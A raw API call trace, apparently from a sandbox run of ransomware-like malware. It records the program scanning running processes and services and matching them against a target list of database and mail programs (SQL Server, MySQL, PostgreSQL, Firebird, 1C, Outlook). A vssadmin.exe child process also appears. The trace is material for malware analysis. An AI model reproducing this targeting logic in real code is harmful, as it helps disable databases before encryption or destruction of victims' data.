	[0139.724] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Themes") returned -1
	[0139.724] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Themes") returned -1
	[0139.724] lstrcmpiW (lpString1="sqlwriter", lpString2="Themes") returned -1
	[0139.724] lstrcmpiW (lpString1="mssqlserver", lpString2="Themes") returned -1
	[0139.724] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Themes") returned -1
	[0139.724] lstrlenW (lpString="UxSms") returned 5
	[0139.724] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="UxSms") returned -1
	[0139.724] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="UxSms") returned -1
	[0139.724] lstrcmpiW (lpString1="sqlwriter", lpString2="UxSms") returned -1
	[0139.724] lstrcmpiW (lpString1="mssqlserver", lpString2="UxSms") returned -1
	[0139.725] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="UxSms") returned -1
	[0139.725] HeapFree (in: hHeap=0x7ab0000, dwFlags=0x0, lpMem=0xb612378 | out: hHeap=0x7ab0000) returned 1
	[0139.725] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x398
	[0139.727] Process32FirstW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1
	[0139.727] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4c, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1
	[0139.727] lstrlenW (lpString="System") returned 6
	[0139.727] lstrcmpiW (lpString1="1c8.exe", lpString2="System") returned -1
	[0139.727] lstrcmpiW (lpString1="1cv77.exe", lpString2="System") returned -1
	[0139.727] lstrcmpiW (lpString1="outlook.exe", lpString2="System") returned -1
	[0139.727] lstrcmpiW (lpString1="postgres.exe", lpString2="System") returned -1
	[0139.727] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="System") returned -1
	[0139.727] lstrcmpiW (lpString1="mysqld.exe", lpString2="System") returned -1
	[0139.727] lstrcmpiW (lpString1="sqlservr.exe", lpString2="System") returned -1
	[0139.727] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1
	[0139.728] lstrlenW (lpString="smss.exe") returned 8
	[0139.728] lstrcmpiW (lpString1="1c8.exe", lpString2="smss.exe") returned -1
	[0139.728] lstrcmpiW (lpString1="1cv77.exe", lpString2="smss.exe") returned -1
	[0139.728] lstrcmpiW (lpString1="outlook.exe", lpString2="smss.exe") returned -1
	[0139.728] lstrcmpiW (lpString1="postgres.exe", lpString2="smss.exe") returned -1
	[0139.728] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="smss.exe") returned -1
	[0139.728] lstrcmpiW (lpString1="mysqld.exe", lpString2="smss.exe") returned -1
	[0139.728] lstrcmpiW (lpString1="sqlservr.exe", lpString2="smss.exe") returned 1
	[0139.728] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x148, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0139.728] lstrlenW (lpString="csrss.exe") returned 9
	[0139.728] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0139.728] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0139.728] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0139.728] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0139.728] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0139.728] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0139.728] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0139.728] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x178, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1
	[0139.729] lstrlenW (lpString="wininit.exe") returned 11
	[0139.729] lstrcmpiW (lpString1="1c8.exe", lpString2="wininit.exe") returned -1
	[0139.729] lstrcmpiW (lpString1="1cv77.exe", lpString2="wininit.exe") returned -1
	[0139.729] lstrcmpiW (lpString1="outlook.exe", lpString2="wininit.exe") returned -1
	[0139.729] lstrcmpiW (lpString1="postgres.exe", lpString2="wininit.exe") returned -1
	[0139.729] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="wininit.exe") returned -1
	[0139.729] lstrcmpiW (lpString1="mysqld.exe", lpString2="wininit.exe") returned -1
	[0139.729] lstrcmpiW (lpString1="sqlservr.exe", lpString2="wininit.exe") returned -1
	[0139.729] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1
	[0139.729] lstrlenW (lpString="csrss.exe") returned 9
	[0139.729] lstrcmpiW (lpString1="1c8.exe", lpString2="csrss.exe") returned -1
	[0139.729] lstrcmpiW (lpString1="1cv77.exe", lpString2="csrss.exe") returned -1
	[0139.729] lstrcmpiW (lpString1="outlook.exe", lpString2="csrss.exe") returned 1
	[0139.729] lstrcmpiW (lpString1="postgres.exe", lpString2="csrss.exe") returned 1
	[0139.729] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="csrss.exe") returned 1
	[0139.729] lstrcmpiW (lpString1="mysqld.exe", lpString2="csrss.exe") returned 1
	[0139.729] lstrcmpiW (lpString1="sqlservr.exe", lpString2="csrss.exe") returned 1
	[0139.729] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x170, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1
	[0139.730] lstrlenW (lpString="winlogon.exe") returned 12
	[0139.730] lstrcmpiW (lpString1="1c8.exe", lpString2="winlogon.exe") returned -1
	[0139.730] lstrcmpiW (lpString1="1cv77.exe", lpString2="winlogon.exe") returned -1
	[0139.730] lstrcmpiW (lpString1="outlook.exe", lpString2="winlogon.exe") returned -1
	[0139.730] lstrcmpiW (lpString1="postgres.exe", lpString2="winlogon.exe") returned -1
	[0139.730] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="winlogon.exe") returned -1
	[0139.730] lstrcmpiW (lpString1="mysqld.exe", lpString2="winlogon.exe") returned -1
	[0139.730] lstrcmpiW (lpString1="sqlservr.exe", lpString2="winlogon.exe") returned -1
	[0139.730] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="services.exe")) returned 1
	[0139.730] lstrlenW (lpString="services.exe") returned 12
	[0139.730] lstrcmpiW (lpString1="1c8.exe", lpString2="services.exe") returned -1
	[0139.730] lstrcmpiW (lpString1="1cv77.exe", lpString2="services.exe") returned -1
	[0139.730] lstrcmpiW (lpString1="outlook.exe", lpString2="services.exe") returned -1
	[0139.730] lstrcmpiW (lpString1="postgres.exe", lpString2="services.exe") returned -1
	[0139.730] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="services.exe") returned -1
	[0139.730] lstrcmpiW (lpString1="mysqld.exe", lpString2="services.exe") returned -1
	[0139.730] lstrcmpiW (lpString1="sqlservr.exe", lpString2="services.exe") returned 1
	[0139.730] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x178, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1
	[0139.731] lstrlenW (lpString="lsass.exe") returned 9
	[0139.731] lstrcmpiW (lpString1="1c8.exe", lpString2="lsass.exe") returned -1
	[0139.731] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsass.exe") returned -1
	[0139.731] lstrcmpiW (lpString1="outlook.exe", lpString2="lsass.exe") returned 1
	[0139.731] lstrcmpiW (lpString1="postgres.exe", lpString2="lsass.exe") returned 1
	[0139.731] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsass.exe") returned 1
	[0139.731] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsass.exe") returned 1
	[0139.731] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsass.exe") returned 1
	[0139.731] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x178, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1
	[0139.731] lstrlenW (lpString="lsm.exe") returned 7
	[0139.731] lstrcmpiW (lpString1="1c8.exe", lpString2="lsm.exe") returned -1
	[0139.731] lstrcmpiW (lpString1="1cv77.exe", lpString2="lsm.exe") returned -1
	[0139.731] lstrcmpiW (lpString1="outlook.exe", lpString2="lsm.exe") returned 1
	[0139.731] lstrcmpiW (lpString1="postgres.exe", lpString2="lsm.exe") returned 1
	[0139.731] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="lsm.exe") returned 1
	[0139.731] lstrcmpiW (lpString1="mysqld.exe", lpString2="lsm.exe") returned 1
	[0139.731] lstrcmpiW (lpString1="sqlservr.exe", lpString2="lsm.exe") returned 1
	[0139.731] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x254, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0139.732] lstrlenW (lpString="svchost.exe") returned 11
	[0139.732] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0139.732] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0139.732] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0139.732] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0139.732] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0139.732] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0139.732] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0139.732] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x298, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0139.732] lstrlenW (lpString="svchost.exe") returned 11
	[0139.732] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0139.732] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0139.732] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0139.732] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0139.732] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0139.732] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0139.732] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0139.732] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0139.733] lstrlenW (lpString="svchost.exe") returned 11
	[0139.733] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0139.733] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0139.733] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0139.733] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0139.733] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0139.733] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0139.733] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0139.733] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x338, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0139.733] lstrlenW (lpString="svchost.exe") returned 11
	[0139.733] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0139.733] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0139.733] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0139.733] lstrcmpiW (lpString1="postgres.exe", lpString2="svchost.exe") returned -1
	[0139.733] lstrcmpiW (lpString1="mysqld-nt.exe", lpString2="svchost.exe") returned -1
	[0139.733] lstrcmpiW (lpString1="mysqld.exe", lpString2="svchost.exe") returned -1
	[0139.733] lstrcmpiW (lpString1="sqlservr.exe", lpString2="svchost.exe") returned -1
	[0139.733] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x370, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0139.734] lstrlenW (lpString="svchost.exe") returned 11
	[0139.734] lstrcmpiW (lpString1="1c8.exe", lpString2="svchost.exe") returned -1
	[0139.734] lstrcmpiW (lpString1="1cv77.exe", lpString2="svchost.exe") returned -1
	[0139.734] lstrcmpiW (lpString1="outlook.exe", lpString2="svchost.exe") returned -1
	[0139.734] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3ac, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1
	[0139.734] lstrlenW (lpString="audiodg.exe") returned 11
	[0139.734] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0xc8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0139.735] lstrlenW (lpString="svchost.exe") returned 11
	[0139.735] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x10, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0139.735] lstrlenW (lpString="svchost.exe") returned 11
	[0139.735] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xd, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1
	[0139.735] lstrlenW (lpString="spoolsv.exe") returned 11
	[0139.735] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x468, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1
	[0139.735] lstrlenW (lpString="svchost.exe") returned 11
	[0139.736] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x474, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xa, th32ParentProcessID=0x1c8, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1
	[0139.736] lstrlenW (lpString="taskhost.exe") returned 12
	[0139.736] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4c0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x1ac, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1
	[0139.736] lstrlenW (lpString="userinit.exe") returned 12
	[0139.736] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x338, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1
	[0139.736] lstrlenW (lpString="dwm.exe") returned 7
	[0139.737] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1d, th32ParentProcessID=0x4c0, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1
	[0139.737] lstrlenW (lpString="explorer.exe") returned 12
	[0139.737] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x5e0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x15, th32ParentProcessID=0x4ec, pcPriClassBase=8, dwFlags=0x0, szExeFile="gjfkyfli;.exe")) returned 1
	[0139.737] lstrlenW (lpString="gjfkyfli;.exe") returned 13
	[0139.737] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x694, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x5d0, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1
	[0139.738] lstrlenW (lpString="reader_sl.exe") returned 13
	[0139.738] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x730, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x5e0, pcPriClassBase=8, dwFlags=0x0, szExeFile="cmd.exe")) returned 1
	[0139.738] lstrlenW (lpString="cmd.exe") returned 7
	[0139.738] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x744, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x184, pcPriClassBase=8, dwFlags=0x0, szExeFile="conhost.exe")) returned 1
	[0139.738] lstrlenW (lpString="conhost.exe") returned 11
	[0139.738] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x730, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 1
	[0139.738] lstrlenW (lpString="vssadmin.exe") returned 12
	[0139.739] Process32NextW (in: hSnapshot=0x398, lppe=0x96cfd34 | out: lppe=0x96cfd34*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x794, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x730, pcPriClassBase=8, dwFlags=0x0, szExeFile="vssadmin.exe")) returned 0
	[0139.739] CloseHandle (hObject=0x398) returned 1
	[0139.739] Sleep (dwMilliseconds=0x1f4) 
	[0140.279] OpenSCManagerW (lpMachineName=0x0, lpDatabaseName=0x0, dwDesiredAccess=0x4) returned 0xb617048
	[0140.281] EnumServicesStatusExW (in: hSCManager=0xb617048, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0x0, cbBufSize=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0x0, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 0
	[0140.283] GetLastError () returned 0xea
	[0140.283] RtlAllocateHeap (HeapHandle=0x7ab0000, Flags=0x0, Size=0xc9a) returned 0xb612378
	[0140.283] EnumServicesStatusExW (in: hSCManager=0xb617048, InfoLevel=0x0, dwServiceType=0x30, dwServiceState=0x1, lpServices=0xb612378, cbBufSize=0xc9a, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0, pszGroupName=0x0 | out: lpServices=0xb612378, pcbBytesNeeded=0x96cff44, lpServicesReturned=0x96cff5c, lpResumeHandle=0x0) returned 1
	[0140.283] CloseServiceHandle (hSCObject=0xb617048) returned 1
	[0140.283] lstrlenW (lpString="AudioEndpointBuilder") returned 20
	[0140.283] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0140.283] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioEndpointBuilder") returned 1
	[0140.283] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioEndpointBuilder") returned 1
	[0140.283] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioEndpointBuilder") returned 1
	[0140.283] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioEndpointBuilder") returned 1
	[0140.283] lstrlenW (lpString="AudioSrv") returned 8
	[0140.283] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="AudioSrv") returned 1
	[0140.283] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="AudioSrv") returned 1
	[0140.283] lstrcmpiW (lpString1="sqlwriter", lpString2="AudioSrv") returned 1
	[0140.283] lstrcmpiW (lpString1="mssqlserver", lpString2="AudioSrv") returned 1
	[0140.283] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="AudioSrv") returned 1
	[0140.283] lstrlenW (lpString="BFE") returned 3
	[0140.283] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="BFE") returned 1
	[0140.284] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="BFE") returned 1
	[0140.284] lstrcmpiW (lpString1="sqlwriter", lpString2="BFE") returned 1
	[0140.284] lstrcmpiW (lpString1="mssqlserver", lpString2="BFE") returned 1
	[0140.284] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="BFE") returned 1
	[0140.284] lstrlenW (lpString="CryptSvc") returned 8
	[0140.284] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CryptSvc") returned 1
	[0140.284] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CryptSvc") returned 1
	[0140.284] lstrcmpiW (lpString1="sqlwriter", lpString2="CryptSvc") returned 1
	[0140.284] lstrcmpiW (lpString1="mssqlserver", lpString2="CryptSvc") returned 1
	[0140.284] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CryptSvc") returned 1
	[0140.284] lstrlenW (lpString="CscService") returned 10
	[0140.284] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="CscService") returned 1
	[0140.284] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="CscService") returned 1
	[0140.284] lstrcmpiW (lpString1="sqlwriter", lpString2="CscService") returned 1
	[0140.284] lstrcmpiW (lpString1="mssqlserver", lpString2="CscService") returned 1
	[0140.284] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="CscService") returned 1
	[0140.284] lstrlenW (lpString="DcomLaunch") returned 10
	[0140.284] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DcomLaunch") returned 1
	[0140.284] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DcomLaunch") returned 1
	[0140.284] lstrcmpiW (lpString1="sqlwriter", lpString2="DcomLaunch") returned 1
	[0140.284] lstrcmpiW (lpString1="mssqlserver", lpString2="DcomLaunch") returned 1
	[0140.284] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DcomLaunch") returned 1
	[0140.284] lstrlenW (lpString="Dhcp") returned 4
	[0140.284] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dhcp") returned 1
	[0140.284] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dhcp") returned 1
	[0140.284] lstrcmpiW (lpString1="sqlwriter", lpString2="Dhcp") returned 1
	[0140.284] lstrcmpiW (lpString1="mssqlserver", lpString2="Dhcp") returned 1
	[0140.284] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dhcp") returned 1
	[0140.284] lstrlenW (lpString="Dnscache") returned 8
	[0140.284] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="Dnscache") returned 1
	[0140.284] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="Dnscache") returned 1
	[0140.284] lstrcmpiW (lpString1="sqlwriter", lpString2="Dnscache") returned 1
	[0140.284] lstrcmpiW (lpString1="mssqlserver", lpString2="Dnscache") returned 1
	[0140.284] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="Dnscache") returned 1
	[0140.285] lstrlenW (lpString="DPS") returned 3
	[0140.285] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="DPS") returned 1
	[0140.285] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="DPS") returned 1
	[0140.285] lstrcmpiW (lpString1="sqlwriter", lpString2="DPS") returned 1
	[0140.285] lstrcmpiW (lpString1="mssqlserver", lpString2="DPS") returned 1
	[0140.285] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="DPS") returned 1
	[0140.285] lstrlenW (lpString="eventlog") returned 8
	[0140.285] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="eventlog") returned 1
	[0140.285] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="eventlog") returned 1
	[0140.285] lstrcmpiW (lpString1="sqlwriter", lpString2="eventlog") returned 1
	[0140.285] lstrcmpiW (lpString1="mssqlserver", lpString2="eventlog") returned 1
	[0140.285] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="eventlog") returned 1
	[0140.285] lstrlenW (lpString="EventSystem") returned 11
	[0140.285] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="EventSystem") returned 1
	[0140.285] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="EventSystem") returned 1
	[0140.285] lstrcmpiW (lpString1="sqlwriter", lpString2="EventSystem") returned 1
	[0140.285] lstrcmpiW (lpString1="mssqlserver", lpString2="EventSystem") returned 1
	[0140.285] lstrcmpiW (lpString1="sqlserveradhelper", lpString2="EventSystem") returned 1
	[0140.285] lstrlenW (lpString="gpsvc") returned 5
	[0140.285] lstrcmpiW (lpString1="FirebirdGuardianDefaultInstance", lpString2="gpsvc") returned -1
	[0140.285] lstrcmpiW (lpString1="FirebirdServerDefaultInstance", lpString2="gpsvc") returned -1
	[0140.285] lstrcmpiW (lpString1="sqlwriter", lpString2="gpsvc") returned 1
